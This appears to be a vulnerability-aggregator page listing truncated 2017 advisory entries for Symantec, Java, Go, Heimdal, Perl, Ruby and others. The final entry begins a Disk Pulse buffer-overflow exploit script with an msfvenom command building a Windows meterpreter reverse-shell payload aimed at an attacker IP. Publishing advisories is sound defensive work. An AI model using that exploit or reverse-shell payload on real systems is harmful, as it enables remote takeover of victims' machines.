Circle with Disney Denial of Service Vulnerability (CNVD-2017-33240)

Circle with Disney is a set of network monitoring and management devices for monitoring children's online behavior from Circle Media, Inc. in the United States. A denial of service vulnerability exists in the API daemon in Circle with Disney version 2.0.1. The vulnerability can be exploited to...

Memory corruption

In Symantec Encryption Desktop before SED 10.4.1 MP2HF1, a kernel memory leak is a type of resource leak that can occur when a computer program incorrectly manages memory allocations in such a way that memory which is no longer needed is not released. In object-oriented programming, a memory leak...

CVE-2017-13682

CVE-2017-13682 affects Symantec Encryption Desktop (SED) and related Symantec Endpoint Encryption prior to 10.4.1 MP2HF1. The issue is described as a kernel memory leak (a resource leak) in the kernel memory management, leading to a denial of service (DoS) condition. The available connected sourc...

CVE-2017-13682

In Symantec Encryption Desktop before SED 10.4.1 MP2HF1, a kernel memory leak is a type of resource leak that can occur when a computer program incorrectly manages memory allocations in such a way that memory which is no longer needed is not released. In object-oriented programming, a memory leak...

CVE-2017-13683

Symantec Endpoint Encryption (SEE) prior to 11.1.3HF3 contains a kernel memory leak vulnerability (memory resource leak). The issue is addressed in SEE 11.1.3HF3 and in Symantec Encryption Desktop (SED) 10.4.1 MP2HF1; updating to these versions mitigates the vulnerability. CNVD/SEC sources descri...

[SECURITY] Fedora 25 Update: golang-1.7.6-3.fc25

The Go Programming Language...

Oracle Java SE Multiple Vulnerabilities (October 2017 CPU)

The version of Oracle formerly Sun Java SE or Java for Business installed on the remote host is prior to 9 Update 1, 8 Update 151, 7 Update 161, or 6 Update 171. It is, therefore, affected by multiple vulnerabilities related to the following components : - 2D Little CMS 2 - Deployment - Hotspot -...

UBUNTU-CVE-2017-10356

Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE subcomponent: Security. Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker wit...

Google Golang Go Information Disclosure Vulnerability

Google Golang Go is a programming language optimized for programming applications on multiprocessor systems by Google. An information disclosure vulnerability exists in Google Golang Go versions prior to 1.8.4 and 1.9.x versions prior to 1.9.1. An attacker can exploit this vulnerability to conduc...

[SECURITY] Fedora 27 Update: golang-1.9.1-1.fc27

The Go Programming Language...

Debian DLA-1123-1 : golang security update

It was discovered that there was an issue in the Go programming language library where an attacker could generate a MIME request such that the server ran out of file descriptors. For Debian 7 'Wheezy', this issue has been fixed in golang version 2:1.0.2-1.1+deb7u1. We recommend that you upgrade...

AZL-79072 CVE-2017-15042 affecting package golang 1.25.7-1

An unintended cleartext issue exists in Go before 1.8.4 and 1.9.x before 1.9.1. RFC 4954 requires that, during SMTP, the PLAIN auth scheme must only be used on network connections secured with TLS. The original implementation of smtp.PlainAuth in Go 1.0 enforced this requirement, and it was...

Design/Logic Flaw

Go before 1.8.4 and 1.9.x before 1.9.1 allows "go get" remote command execution. Using custom domains, it is possible to arrange things so that example.com/pkg1 points to a Subversion repository but example.com/pkg1/pkg2 points to a Git repository. If the Subversion repository includes a Git...

CVE-2017-15041

Go before 1.8.4 and 1.9.x before 1.9.1 allows "go get" remote command execution. Using custom domains, it is possible to arrange things so that example.com/pkg1 points to a Subversion repository but example.com/pkg1/pkg2 points to a Git repository. If the Subversion repository includes a Git...

CVE-2017-15041

Removed by vendor...

FreeBSD : FreeBSD -- heimdal KDC-REP service name validation vulnerability (420243e9-a840-11e7-b5af-a4badb2f4699)

There is a programming error in the Heimdal implementation that used an unauthenticated, plain-text version of the KDC-REP service name found in a ticket. Impact : An attacker who has control of the network between a client and the service it talks to will be able to impersonate the service,...

[SECURITY] Fedora 26 Update: perl-5.24.3-395.fc26

Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common...

[SECURITY] Fedora 27 Update: ruby-2.4.2-84.fc27

Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks as in Perl. It is simple, straight-forward, and extensible...

[SECURITY] Fedora 27 Update: perl-5.26.1-401.fc27

Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common...

Disk Pulse Enterprise 10.0.12 GET Buffer Overflow

Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.228.158 LPORT=443 -f py buf =...